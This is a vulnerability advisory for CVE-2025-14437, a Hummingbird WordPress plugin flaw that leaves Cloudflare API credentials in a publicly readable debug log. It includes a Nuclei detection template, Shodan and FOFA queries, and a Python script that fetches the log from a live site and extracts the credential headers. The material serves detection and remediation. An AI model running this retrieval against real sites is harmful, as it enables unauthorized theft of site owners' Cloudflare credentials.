
WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File

CVE-2025-14437
Verified

Description

The Hummingbird Performance WordPress plugin, in versions up to and including 3.18.0, exposes sensitive information through its API debug log: improper handling in the plugin's 'request' function records the headers of outbound Cloudflare API calls in wp-content/wphb-logs/api-debug.log, and that file can be fetched without authentication. An unauthenticated attacker can therefore read the site's Cloudflare API credentials (the X-Auth-Email, X-Auth-Key and Authorization header values).

Severity

High

CVSS Score

7.5

Exploit Probability

32%

Affected Product

hummingbird-performance

Published Date

March 26, 2026

Template Author

pussycat0x

CVE-2025-14437.yaml
id: CVE-2025-14437

info:
  name: WordPress Hummingbird <= 3.18.0 - Sensitive Information Exposure via Log File
  author: pussycat0x
  severity: high
  description: |
    The Hummingbird Performance WordPress plugin, in versions up to and including 3.18.0, exposes sensitive information through its API debug log: improper handling in the plugin's 'request' function records the headers of outbound Cloudflare API calls in wp-content/wphb-logs/api-debug.log, and that file can be fetched without authentication. An unauthenticated attacker can therefore read the site's Cloudflare API credentials (the X-Auth-Email, X-Auth-Key and Authorization header values).
  impact: |
    Unauthenticated attackers can extract sensitive credentials, leading to potential account compromise and further attacks.
  remediation: |
    Update to the latest version beyond 3.18.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hummingbird-performance/hummingbird-3180-unauthenticated-sensitive-information-exposure-via-log-files
    - https://wpscan.com/vulnerability/cve-2025-14437
    - https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-14437
    epss-score: 0.31739
    epss-percentile: 0.96866
    cwe-id: CWE-532
  metadata:
    verified: true
    max-request: 1
    vendor: wpmudev
    product: hummingbird-performance
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/hummingbird-performance"
    fofa-query: body="/wp-content/plugins/hummingbird-performance"
  tags: cve,cve2025,wordpress,wp-plugin,hummingbird,exposure,cloudflare,wpmudev,vkev

http:
  - raw:
      - |
        GET /wp-content/wphb-logs/api-debug.log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "WPHB", "X-Auth-Key", "X-Auth-Email", "Authorization")'
        condition: and
# digest: 4b0a00483046022100abc3c0b5a7f9399c7af348fc9d8096673ab5a3890fd1feacf9176991791612c7022100a99405138d5977932ff7c7392ea19877e007c13611468e19f94ed6600285cd77:922c64590222798bb761d5b6d8e72950
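The template's detection condition, re-implemented offline in Python as an added example (this is not part of the Nuclei template or the plugin), together with a small triage helper that pulls the exposed Cloudflare header values out of a matched log body and redacts them for reporting. The log body used here is constructed to resemble a debug log that records request headers; it is not captured from a real site, and the exact on-disk format of the plugin's log is not assumed beyond the header names the template matches on.

```python
"""Offline model of the CVE-2025-14437 template matcher plus a triage helper.

Added example, not the template's or the plugin's own code. SAMPLE_LOG is a
constructed body that merely resembles an API debug log; it is not real data.
"""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Path the template requests and the four markers its contains_all() needs.
LOG_PATH = "/wp-content/wphb-logs/api-debug.log"
REQUIRED_MARKERS = ("WPHB", "X-Auth-Key", "X-Auth-Email", "Authorization")

# Constructed sample body (NOT captured from a live installation).
SAMPLE_LOG = (
    "[2026-03-26 10:00:01] WPHB API request\n"
    "GET https://api.cloudflare.com/client/v4/zones\n"
    '{"X-Auth-Email": "admin@example.com", '
    '"X-Auth-Key": "0123456789abcdef0123456789abcdef01234", '
    '"Authorization": "Bearer cf-example-token-not-real", '
    '"Content-Type": "application/json"}\n'
)

# A log that exists but never recorded a Cloudflare call: must NOT match.
SAMPLE_LOG_NO_CF = (
    "[2026-03-26 10:00:01] WPHB API request\nGET https://example.com/\n"
)

# Header names whose values are Cloudflare API credentials.
HEADER_RE = re.compile(
    r'"(X-Auth-Email|X-Auth-Key|Authorization)"\s*:\s*"([^"]*)"'
)


def matches_template(status_code: int, body: str) -> bool:
    """Same condition as the template's DSL matcher: status 200 AND all markers.

    contains_all() is a plain substring test, so this is case-sensitive and
    independent of the order in which the markers appear.
    """
    return status_code == 200 and all(m in body for m in REQUIRED_MARKERS)


def extract_credentials(body: str) -> dict:
    """Return the last value logged for each sensitive header in a matched body."""
    found = {}
    for name, value in HEADER_RE.findall(body):
        found[name] = value
    return found


def redact(value: str, keep: int = 4) -> str:
    """Keep a short prefix so a finding can be tied to a specific credential
    in the Cloudflare dashboard without reproducing the secret in a report."""
    if len(value) <= keep:
        return "*" * len(value)
    return value[:keep] + "*" * (len(value) - keep)


def log_url(base_url: str) -> str:
    """Build the exact URL the template requests for a given WordPress root."""
    return urljoin(base_url.rstrip("/") + "/", LOG_PATH.lstrip("/"))


def fetch_and_check(base_url: str, timeout: float = 10.0) -> dict:
    """Live check (requires network). Only run against hosts you are
    authorized to test; the offline functions above need no network."""
    try:
        with urllib.request.urlopen(log_url(base_url), timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        status, body = exc.code, ""
    hit = matches_template(status, body)
    creds = extract_credentials(body) if hit else {}
    return {
        "vulnerable": hit,
        "status": status,
        "exposed": {name: redact(val) for name, val in creds.items()},
    }


if __name__ == "__main__":
    print("matches:", matches_template(200, SAMPLE_LOG))
    for name, val in extract_credentials(SAMPLE_LOG).items():
        print(name, "=", redact(val))
```

Two caveats follow directly from the matcher: it requires all four markers, so a site whose log file is reachable but has never recorded a Cloudflare request will not match even though the file is still publicly served; and because `contains_all` is case-sensitive, a log that writes header names in a different case would also be missed. Treat a reachable `api-debug.log` as a finding in its own right, and rotate any Cloudflare key or token that appears in it.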
CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
CVE-2025-14437
CWE ID:
CWE-532

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hummingbird-performance/hummingbird-3180-unauthenticated-sensitive-information-exposure-via-log-files
https://wpscan.com/vulnerability/cve-2025-14437
https://plugins.trac.wordpress.org/changeset/3421187/hummingbird-performance

Remediation Steps

Update to the latest version beyond 3.18.0.